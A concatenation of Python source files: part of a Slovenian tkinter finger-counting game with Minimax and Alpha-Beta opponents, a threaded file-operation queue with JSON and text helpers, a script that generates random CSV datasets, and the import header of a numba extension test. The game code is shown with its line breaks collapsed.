label_hello.grid(row=0, columnspan=2) label_roke.grid(row=1, column=0, sticky='e') self.entry_roke.grid(row=1, column=1, sticky='w') self.entry_roke.insert(0, "2") label_prsti.grid(row=2, column=0, sticky='e') self.entry_prsti.grid(row=2, column=1, sticky='w') self.entry_prsti.insert(0, "5") label_igralec1.grid(row=3, column=0, sticky='e') label_igralec2.grid(row=3, column=1, sticky='w') self.optionmenu_igralec1.grid(row=4, column=0, sticky='e') self.optionmenu_igralec2.grid(row=4, column=1, sticky='w') button_zacni.grid(row=5, columnspan=2) def preberi_igralce(self): """Metoda, ki prebere izbrane igralce in začne igro.""" # Dobimo izbiri. option1 = self.option1.get() option2 = self.option2.get() if option1 == "Človek": if option2 == "Človek": self.zacni_igro(Clovek(self), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Clovek(self), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax++": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, 
Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Alpha-Beta": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) def zacni_igro(self, igralec1, igralec2): """ Metoda, ki začne igro, torej nastavi izbrane igralce in uvodni UI.""" # Preberemo število rok in prstov. Če število rok ni int, # ali ne ustreza določenim zahtevam, vrnemo None. try: self.roke = int(self.entry_roke.get()) if self.roke <= 0: return except: return try: self.prsti = int(self.entry_prsti.get()) if self.prsti <= 1: return except: return # Ustvarimo objekte igralcev. self.igralec_1 = igralec1 self.igralec_2 = igralec2 # Začnemo igro self.igra = Igra(self.prsti, self.roke) # Nastavimo UI za igro self.setup_ui() def setup_ui(self): """Metoda (na novo) vzpostavi celotno igralno desko in jo nastavi na izbrano pozicijo.""" self.new_frame() # S tem bomo preverjali, ali lahko že opravimo potezo. self.potrebno_opraviti = [None, None] # Nastavimo dimenzije Canvasa. self.WDTH_CANVAS = 2 * self.prsti * (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) + NewGui.DIFF_MID self.HGHT_CANVAS = self.roke * (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) # Ustvarimo igralno desko. 
self.igralna_deska = tk.Canvas(self.main, width=self.WDTH_CANVAS, height=self.HGHT_CANVAS) self.igralna_deska.grid() # Bindamo tipkovnico na igralna_deska. self.igralna_deska.focus_set() # Če je na potezi človek, bindamo gumbe, sicer ne. if (self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek))\ or (self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek)): self.igralna_deska.bind("<Button-1>", self.deska_klik) self.igralna_deska.bind("<Button-3>", self.naredi_delitev) self.igralna_deska.bind("<BackSpace>", self.razveljavi) # Za vsak prst na vsaki roki naredimo krogec. for roka in range(self.roke): x = NewGui.DIFF_KROGCI y = roka * (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) + NewGui.DIFF_KROGCI//2 self.seznam_krogci = [[[None for _ in range(self.prsti)] for _ in range(self.roke)], [[None for _ in range(self.prsti)] for _ in range(self.roke)]] for prst in range(self.prsti): if self.igra.position[IGRALEC_1][roka] == 0: self.seznam_krogci[IGRALEC_1][roka][prst] = self.igralna_deska.create_oval(x, y, x+NewGui.OVAL_SIZE, y+NewGui.OVAL_SIZE, outline='grey', dash=(5,), fill="") elif prst < self.igra.position[IGRALEC_1][roka]: self.seznam_krogci[IGRALEC_1][roka][prst] = self.igralna_deska.create_oval(x, y, x+NewGui.OVAL_SIZE, y+NewGui.OVAL_SIZE, outline='red', fill='red') else: self.seznam_krogci[IGRALEC_1][roka][prst] = self.igralna_deska.create_oval(x, y, x+NewGui.OVAL_SIZE, y+NewGui.OVAL_SIZE, outline='red') if self.igra.position[IGRALEC_2][roka] == 0: self.seznam_krogci[IGRALEC_2][roka][prst] = self.igralna_deska.create_oval(self.WDTH_CANVAS-x-NewGui.OVAL_SIZE, y, self.WDTH_CANVAS-x, y+NewGui.OVAL_SIZE, outline='grey', dash=(5,), fill="") elif prst < self.igra.position[IGRALEC_2][roka]: self.seznam_krogci[IGRALEC_2][roka][prst] = self.igralna_deska.create_oval(self.WDTH_CANVAS-x-NewGui.OVAL_SIZE, y, self.WDTH_CANVAS-x, y+NewGui.OVAL_SIZE, outline='green', fill='green') else: self.seznam_krogci[IGRALEC_2][roka][prst] = 
self.igralna_deska.create_oval(self.WDTH_CANVAS-x-NewGui.OVAL_SIZE, y, self.WDTH_CANVAS-x, y+NewGui.OVAL_SIZE, outline='green') x += NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI for roka in range(self.roke): for prst in range(self.prsti): print(self.seznam_krogci[IGRALEC_1][roka][prst]) print(self.seznam_krogci[IGRALEC_2][roka][prst]) print("\n") try: self.napis.destroy() except: pass # Preverimo, ali je konec igre, remi. if self.igra.je_konec(): if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je ZELENI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je RDECI.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() elif self.igra.je_remi(): self.napis = tk.Label(self.main, text="KONEC IGRE!\nPrvic ponovljeno, na pol izgubljeno.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() else: if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="Na potezi je RDECI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="Na potezi je ZELENI.") if self.igra.na_potezi == IGRALEC_1: self.igralec_1.igraj() elif self.igra.na_potezi == IGRALEC_2: self.igralec_2.igraj() self.napis.grid() def prekini_igralce(self): """Metoda, ki prekine igralce. Potrebno le za računalnik (pri človeku passa).""" if self.igralec_1: self.igralec_1.prekini() if self.igralec_2: self.igralec_2.prekini() def deska_klik(self, event): """Metoda posrednik med klikom in preraunavanjem poteze. Skrbi le za shranitev koordinat, da lahko ob kliku kličemo funkcijo brez 'lambda:...'.""" x = event.x y = event.y self.preracunaj_potezo((x,y)) def preracunaj_potezo(self, p): """Metoda, ki na podlagi koordinat klika določi, katero roko smo izbrali. 
Če smo izbrali že svojo in nasprotnikovo roko, opravi potezo. Tu je v pomoč seznam potrebno_opraviti.""" (x,y) = p igralec = None # Po x koordinati določimo, ali gre za roko igralca 1 ali igralca 2. if x < (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) * self.prsti: igralec = IGRALEC_1 elif x > self.WDTH_CANVAS - (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) * self.prsti: igralec = IGRALEC_2 if igralec != None: tmp = self.potrebno_opraviti[igralec] print(tmp) roka = (int(y) - NewGui.DIFF_KROGCI//2)//(NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) self.potrebno_opraviti[igralec] = roka if tmp != None and tmp != roka: for prst in range(self.prsti): if self.igra.na_potezi == IGRALEC_1: if prst < self.igra.position[IGRALEC_1][tmp]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][tmp][prst], fill="red", outline="red") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][tmp][prst], outline="red") else: if prst < self.igra.position[IGRALEC_2][tmp]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][tmp][prst], fill="green", outline="green") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][tmp][prst], outline="green") for prst in range(self.prsti): if prst < self.igra.position[igralec][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[igralec][roka][prst], fill="blue", outline="blue") else: self.igralna_deska.itemconfig(self.seznam_krogci[igralec][roka][prst], outline="blue") # Če sta izbrani obe roki, opravimo potezo in spremenimo barvo krogcev. 
if self.potrebno_opraviti[IGRALEC_1] != None and self.potrebno_opraviti[IGRALEC_2] != None: for prst in range(self.prsti): if prst < self.igra.position[IGRALEC_1][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], fill="red", outline="red") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], outline="red") if prst < self.igra.position[IGRALEC_2][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], fill="green", outline="green") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], outline="green") if self.igra.je_veljavna_poteza(self.potrebno_opraviti[IGRALEC_1], self.potrebno_opraviti[IGRALEC_2]): self.naredi_potezo(self.potrebno_opraviti[IGRALEC_1], self.potrebno_opraviti[IGRALEC_2]) def naredi_potezo(self, roka_igralca1, roka_igralca2): """Metoda, ki naredi potezo.""" if self.igra.na_potezi == IGRALEC_1: self.igra.opravi_potezo(roka_igralca1, roka_igralca2) for prst in range(self.prsti): if self.igra.position[IGRALEC_2][roka_igralca2] == 0: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka_igralca2][prst], fill="", outline='grey', dash=(5,)) print("Uniči roko") elif prst < self.igra.position[IGRALEC_2][roka_igralca2]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka_igralca2][prst], fill='green', outline='green') print("Barvaj zeleno") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka_igralca2][prst], fill="", outline='green') print("Prazen zelen") elif self.igra.na_potezi == IGRALEC_2: self.igra.opravi_potezo(roka_igralca2, roka_igralca1) for prst in range(self.prsti): if self.igra.position[IGRALEC_1][roka_igralca1] == 0: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka_igralca1][prst], fill="", outline='grey', dash=(5,)) print("Uniči roko") elif prst < self.igra.position[IGRALEC_1][roka_igralca1]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka_igralca1][prst], 
fill='red', outline='red') print("Barvaj rdeče") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka_igralca1][prst], fill="", outline='red') print("Prazen rdeč") self.igralna_deska.update_idletasks() self.potrebno_opraviti = [None, None] if (self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek))\ or (self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek)): self.igralna_deska.bind("<Button-1>", self.deska_klik) self.igralna_deska.bind("<Button-3>", self.naredi_delitev) self.igralna_deska.bind("<BackSpace>", self.razveljavi) else: self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace>") try: self.napis.destroy() except: pass # Preverimo, ali je konec igre, remi. if self.igra.je_konec(): if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je ZELENI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je RDECI.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() elif self.igra.je_remi(): self.napis = tk.Label(self.main, text="KONEC IGRE!\nPrvic ponovljeno, na pol izgubljeno.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() else: if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="Na potezi je RDECI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="Na potezi je ZELENI.") if self.igra.na_potezi == IGRALEC_1: self.igralec_1.igraj() elif self.igra.na_potezi == IGRALEC_2: self.igralec_2.igraj() self.napis.grid() def naredi_delitev(self, event=None): """Metoda, ki naredi delitev.""" self.igra.je_veljavna_delitev() if self.igra.moznost_delitve: self.igra.opravi_delitev() for roka in range(self.roke): for prst in 
range(self.prsti): if self.igra.na_potezi == IGRALEC_1: if prst < self.igra.position[IGRALEC_1][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], fill='red', outline='red', dash=()) else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], fill="", outline='red', dash=()) elif self.igra.na_potezi == IGRALEC_2: if prst < self.igra.position[IGRALEC_2][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], fill='green', outline='green', dash=()) else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], fill="", outline='green', dash=()) def razveljavi(self, event): """Metoda, ki razveljavi potezo. Seveda lahko to stori le človek, zato preverimo, ali je na potezi človek.""" if self.igra.history != []: if self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek): if isinstance(self.igralec_2, Racunalnik) and self.igra.history[len(self.igra.history)-1][1] != IGRALEC_1: self.igra.razveljavi_potezo() self.igra.razveljavi_potezo() self.setup_ui() elif self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek): if isinstance(self.igralec_1, Racunalnik) and self.igra.history[len(self.igra.history)-1][1] != IGRALEC_2: self.igra.razveljavi_potezo() self.igra.razveljavi_potezo() self.setup_ui() def new_frame(self): """Metoda, ki ustvari nov Frame in pred tem pobriše starega, če obstaja.""" try: self.main.destroy() except: pass finally: self.main = tk.Frame(self.master) self.main.grid() def pravila(self): """Metoda, ki napiše pravila igre.""" self.new_frame() f = open('README.md', 'r') pravila = f.read() f.close() tk.Label(self.main, text=pravila, justify='left').grid() def help(self): """Metoda, ki napiše nekaj namigov.""" help = "Za delitev pritisni desni miškin gumb.\nZa razveljavitev poteze pritisni povratnico.\n\nNasvet: Za boljšo preglednost priporočamo uporabo klasičnega uporabniškega vmesnika za število prstov, ki presega 10." 
tk.Label(self.main, text=help, justify='left').grid() tk.Button(self.main, text="Nova igra", command=self.izbira_igre).grid() ################################################################################################## # # Razred Clovek # ################################################################################################## class Clovek(): def __init__(self, gui): self.gui = gui def igraj(self): # Človeka ne rabimo siliti k opravljanju potez. pass def prekini(self): # Človeka ne rabimo prekiniti; on se sam prekine. pass def klik(self, p): # Ob kliku preračunamo potezo. self.gui.preracunaj_potezo() ################################################################################################## # # Razred Racunalnik # # Razred, ki skrbi za vse v zvezi z računalnikom in komunikacijo z izbranim algoritmom. # ################################################################################################## class Racunalnik(): def __init__(self, gui, algoritem): # Zapomnimo si gui in nastavimo izbran algoritem. self.gui = gui self.algoritem = algoritem self.mislec = None def igraj(self): """Metoda, ki prisili algoritem, da izračuna potezo.""" self.mislec = threading.Thread(target=lambda:self.algoritem.izracunaj_potezo(self.gui.igra.kopija())) self.mislec.start() # Čez 100ms preverimo, ali že imamo potezo. self.gui.main.after(100, self.preveri_potezo) def preveri_potezo(self): """Metoda, ki preveri, ali že imamo potezo. Če jo imamo, jo opravimo, drugače se spet pokličemo.""" if self.algoritem.poteza is not None: if self.algoritem.poteza[0]: self.gui.naredi_delitev() if self.gui.igra.na_potezi == IGRALEC_1: try: self.gui.naredi_potezo(self.algoritem.poteza[1], self.algoritem.poteza[2]) except: pass else: try: self.gui.naredi_potezo(self.algoritem.poteza[2], self.algoritem.poteza[1]) except: pass # Ker smo našli potezo, misleca ne rabimo več. 
self.mislec = None else: self.gui.main.after(100, self.preveri_potezo) def prekini(self): """Metoda, ki prekine misleca, če smo to zahtevali.""" if self.mislec: self.algoritem.prekini() self.mislec.join() self.mislec = None def klik(self, p): # Se ne odzivamo na klike, ko razmišljamo. pass ################################################################################################## # # Razred Minimax # # Računalnik računa svoje poteze z algoritmom Minimax # ################################################################################################## class Minimax(): def __init__(self, globina): self.globina = globina self.prekinitev = False self.igra = None # dobimo kasneje self.jaz = None # dobimo kasneje self.poteza = None def prekini(self): """Metoda, ki jo pokliče GUI, če je treba nehati razmišljati, ker je uporabnik zaprl okno ali izbral novo igro.""" self.prekinitev = True def izracunaj_potezo(self, igra): """Izračunaj potezo za trenutno stanje dane igre.""" self.igra = igra self.jaz = self.igra.na_potezi self.prekinitev = False # Sem napišemo potezo, ki jo najdemo. self.poteza = None # Poženemo minimax. (poteza, vrednost) = self.minimax(self.globina, True) self.jaz = None self.igra = None # Če nismo prekinili razmišljanja, lahko nastavimo potezo. if not self.prekinitev: time.sleep(2) self.poteza = poteza # Vrednosti igre ZMAGA = 1000000000 NESKONCNO = ZMAGA + 1 def vrednost_pozicije(self): """Oceni vrednost pozicije po postopku: naši prsti so plus, nasprotnikovi minus.""" stevilo_prstov = 0 for roka in self.igra.position[self.igra.na_potezi]: if roka == 0: stevilo_prstov -= 5 else: stevilo_prstov -= roka for roka in self.igra.position[nasprotnik(self.igra.na_potezi)]: if roka == 0: stevilo_prstov += 5 else: stevilo_prstov += roka # != self.jaz zato, ker je po opravljeni potezi nasprotnik na vrsti. # Z uporabo negacije, 'smo spet mi'. 
if self.igra.na_potezi != self.jaz: return stevilo_prstov else: return -stevilo_prstov def minimax(self, globina, maksimiziramo): """Glavna metoda algoritma.""" if self.prekinitev: return (None, 0) if self.igra.je_konec(): if self.igra.na_potezi != self.jaz: return (None, Minimax.ZMAGA) else: return (None, -Minimax.ZMAGA) elif self.igra.je_remi(): return (None, 0) else: if globina == 0: return (None, self.vrednost_pozicije()) else: if maksimiziramo: najboljsa_poteza = None vrednost_najboljsa = -Minimax.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.minimax(globina-1, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.razveljavi_potezo() if vrednost > vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) else: # Minimiziramo najboljsa_poteza = None vrednost_najboljsa = Minimax.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.minimax(globina-1, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.opravi_delitev() if vrednost < vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) return (najboljsa_poteza, vrednost_najboljsa) ################################################################################################### # # Razred AlphaBeta # ################################################################################################### class AlphaBeta(): def __init__(self, globina): self.globina = globina self.prekinitev = False self.igra = None self.jaz = None self.poteza = None def prekini(self): """Metoda, ki jo pokliče GUI, če je treba nehati razmišljati, ker je 
uporabnik zaprl okno ali izbral novo igro.""" self.prekinitev = True def izracunaj_potezo(self, igra): self.igra = igra self.prekinitev = False self.jaz = self.igra.na_potezi # Sem napišemo potezo, ki jo najdemo. self.poteza = None # Poženemo alphabeta. (poteza, vrednost) = self.alphabeta(self.globina, -AlphaBeta.NESKONCNO, AlphaBeta.NESKONCNO, True) self.jaz = None self.igra = None # Če nas niso prekinili, lahko nastavimo potezo. if not self.prekinitev: time.sleep(2) self.poteza = poteza ZMAGA = 1000000000 NESKONCNO = ZMAGA + 1 def vrednost_pozicije(self): """Oceni vrednost pozicije po postopku: naši prsti so plus, nasprotnikovi minus.""" stevilo_prstov = 0 for roka in self.igra.position[self.igra.na_potezi]: if roka == 0: stevilo_prstov -= 5 else: stevilo_prstov -= roka for roka in self.igra.position[nasprotnik(self.igra.na_potezi)]: if roka == 0: stevilo_prstov += 5 else: stevilo_prstov += roka if self.igra.na_potezi != self.jaz: return stevilo_prstov else: return -stevilo_prstov def alphabeta(self, globina, alpha, beta, maksimiziramo): """Glavna metoda algoritma.""" if self.prekinitev == True: return (None, 0) if self.igra.je_konec(): if self.igra.na_potezi != self.jaz: return (None, AlphaBeta.ZMAGA) else: return (None, -AlphaBeta.ZMAGA) elif self.igra.je_remi(): return (None, 0) else: if globina == 0: return (None, self.vrednost_pozicije()) else: if maksimiziramo: najboljsa_poteza = None vrednost_najboljsa = -AlphaBeta.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.alphabeta(globina-1, alpha, beta, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.razveljavi_potezo() if vrednost > vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) if vrednost > alpha: alpha = vrednost if beta <= alpha: break else: 
najboljsa_poteza = None vrednost_najboljsa = AlphaBeta.NESKONCNO poteze = self.igra.veljavne_poteze() for (delitev, roka_napadalca, roka_napadenega) in poteze: if delitev: self.igra.opravi_delitev() self.igra.opravi_potezo(roka_napadalca, roka_napadenega) vrednost = self.alphabeta(globina-1, alpha, beta, not maksimiziramo)[1] self.igra.razveljavi_potezo() if delitev: self.igra.razveljavi_potezo() if vrednost < vrednost_najboljsa: vrednost_najboljsa = vrednost najboljsa_poteza = (delitev, roka_napadalca, roka_napadenega) if vrednost < beta: beta = vrednost if beta <= alpha: break return (najboljsa_poteza, vrednost_najboljsa) def select_gui(master, current_game=None): """Funkcija, s katero lahko izberemo GUI med igro.""" # Ustvarimo popup window window = tk.Toplevel() window.title("Izbira grafičnega vmesnika") msg = tk.Message(window, text="Prosim, izberi grafični vmesnik.\nOpozorilo: Trenutna igra bo prekinjena!") msg.grid(row=0, columnspan=2) button_classic = tk.Button(window, text="Classic", command=lambda:select_gui_now("Classic", master, current_game, window)) button_classic.grid(row=1, column=0) button_new = tk.Button(window, text="New", command=lambda:select_gui_now("New", master, current_game, window)) button_new.grid(row=1, column=1) def select_gui_now(gui_type, master, current_game=None, window=None): """Funkcija, ki nastavi izbran GUI. To funkcijo kličemo tudi ob zagonu igrice.""" # Če je slučajno kakšna igra v teku, prekinemo vse # igralce in uničimo okno main. if current_game != None: current_game.prekini_igralce() current_game.main.destroy() # Če je funkcijo klicala funkcija select_gui, moramo # uničiti popup okno. if window != None: window.destroy() # Nastavimo in vrnemo željen GUI. 
if gui_type == "Classic": gui = Gui(master) elif gui_type == "New": gui = NewGui(master) return gui if __name__ == "__main__": root = tk.Tk() root.title("Prstki Beta") app = select_gui_now("New", root) root.mainloop() ################################################################################################### # # PRIMER IGRE # ################################################################################################### ''' if __name__ == "__main__": game = Igra(5,2) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(1, 0) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(1, 1) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_delitev() print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.razveljavi_potezo() print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.razveljavi_potezo() print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) game.opravi_potezo(0, 1) print(game.position) print(game.na_potezi) print(game.veljavne_poteze()) print(game.je_konec()'''
process_file_queue.py
import json
import os
from queue import Queue
import threading


class ProcessFileQueue:
    """Serialize file operations through a single background worker thread.

    Producers enqueue ``(func, arg1, arg2, ...)`` tuples on the class-level
    queue ``q``; the daemon worker pops each tuple and calls ``func(*args)``.
    Using one worker guarantees the queued file operations never run
    concurrently with each other.
    """

    # Shared work queue; each item is a tuple (callable, *args).
    q = Queue()

    @staticmethod
    def start():
        """Spawn the worker thread (daemon, so it never blocks interpreter exit)."""
        print('WORKER STARTED')
        threading.Thread(target=ProcessFileQueue.worker, daemon=True).start()

    @staticmethod
    def worker():
        """Run forever, executing queued (func, *args) items one at a time."""
        while True:
            item = ProcessFileQueue.q.get()
            try:
                if item:
                    func, *args = item
                    func(*args)
            finally:
                # Always acknowledge the item -- even when func raises or the
                # item is falsy -- otherwise q.join() would block forever.
                ProcessFileQueue.q.task_done()


def read_json_file(path, grab):
    """Load JSON from `path` into grab['data']; empty dict if file is missing."""
    if os.path.isfile(path):
        with open(path, 'r') as f:
            grab['data'] = json.load(f)
    else:
        grab['data'] = {}


def read_txt_file(path, grab):
    """Read the whole text file at `path` into grab['data']; '' if missing."""
    if os.path.isfile(path):
        with open(path, 'r') as f:
            grab['data'] = f.read()
    else:
        grab['data'] = ''


def read_txt_file_from_line(path, grab, line_number):
    """Read `path` from 0-based `line_number` onward into grab['data'].

    Missing files yield an empty string. Lines keep their trailing newlines.
    """
    grab['data'] = ''
    if os.path.isfile(path):
        with open(path, 'r') as f:
            # join() avoids the quadratic cost of repeated string +=.
            grab['data'] = ''.join(
                line for i, line in enumerate(f) if i >= line_number)


def write_json_file(path, content):
    """Serialize `content` as JSON to `path`, replacing any existing file."""
    with open(path, 'w+') as f:
        json.dump(content, f)


def write_txt_file(path, content):
    """Write the string `content` to `path`, replacing any existing file."""
    with open(path, 'w+') as f:
        f.write(content)


def write_append_line_json_file(path, content):
    """Append `content` (an already-serialized JSON string) as a new line.

    The first write creates the file without a leading newline; subsequent
    writes are separated from previous lines by '\\n' (JSON-lines layout).
    """
    mode = 'a' if os.path.isfile(path) else 'w+'
    with open(path, mode) as f:
        if mode == 'a':
            f.write('\n')
        f.write(content)
generate_csv_dataset.py
import csv
import os
from datetime import datetime
from threading import Lock, Thread

import numpy

# Upper bound (exclusive) for the generated random integers.
MAX_VALUE = 1000000

# Ten threads append rows to the same CSV file; without a lock, buffered
# writes from different threads could interleave and corrupt a row.
_write_lock = Lock()


def get_random_array(amount):
    """Return `amount` random ints drawn uniformly from [0, MAX_VALUE)."""
    return numpy.random.randint(0, MAX_VALUE, amount)


def save_to_csv(count, file_name: str):
    """Append one CSV row of count//10 random integers to `<file_name>.csv`.

    Each of the 10 writer threads contributes a tenth of `count`, so one
    pass over all threads produces roughly `count` values in total.
    """
    array = get_random_array(count // 10)
    with _write_lock:
        with open(file_name + ".csv", "a", newline="") as file:
            csv.writer(file).writerow(array)


if __name__ == "__main__":
    for key in ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10']:
        for value in [100, 500, 1000, 5000, 10000, 25000, 50000, 100000,
                      250000, 500000, 750000, 1000000, 2500000, 5000000]:
            # Ensure the per-run output directory exists before the
            # threads try to open files inside it.
            os.makedirs('data/{}'.format(key), exist_ok=True)
            time1 = datetime.now()
            threads = [
                Thread(target=save_to_csv,
                       args=(value, 'data/{}/'.format(key) + str(value)))
                for _ in range(10)
            ]
            for t in threads:
                t.start()
            for t in threads:
                t.join()
            time2 = datetime.now()
            print(value, ': ', time2 - time1)
test_extending.py
"""Setup for numba extension-API tests: custom opaque types, implicit casts,
and classical two-step (typing + lowering) function registration."""
import math
import operator
import sys
import pickle
import multiprocessing
import ctypes
import warnings
from distutils.version import LooseVersion
import re

import numpy as np

from numba import njit, jit, vectorize, guvectorize, objmode
from numba.core import types, errors, typing, compiler, cgutils
from numba.core.typed_passes import type_inference_stage
from numba.core.registry import cpu_target
from numba.core.compiler import compile_isolated
from numba.tests.support import (
    TestCase,
    captured_stdout,
    temp_directory,
    override_config,
    run_in_new_process_in_cache_dir,
)
from numba.core.errors import LoweringError
import unittest
from numba.extending import (
    typeof_impl,
    type_callable,
    lower_builtin,
    lower_cast,
    overload,
    overload_attribute,
    overload_method,
    models,
    register_model,
    box,
    unbox,
    NativeValue,
    intrinsic,
    _Intrinsic,
    register_jitable,
    get_cython_function_address,
    is_jitted,
)
from numba.core.typing.templates import (
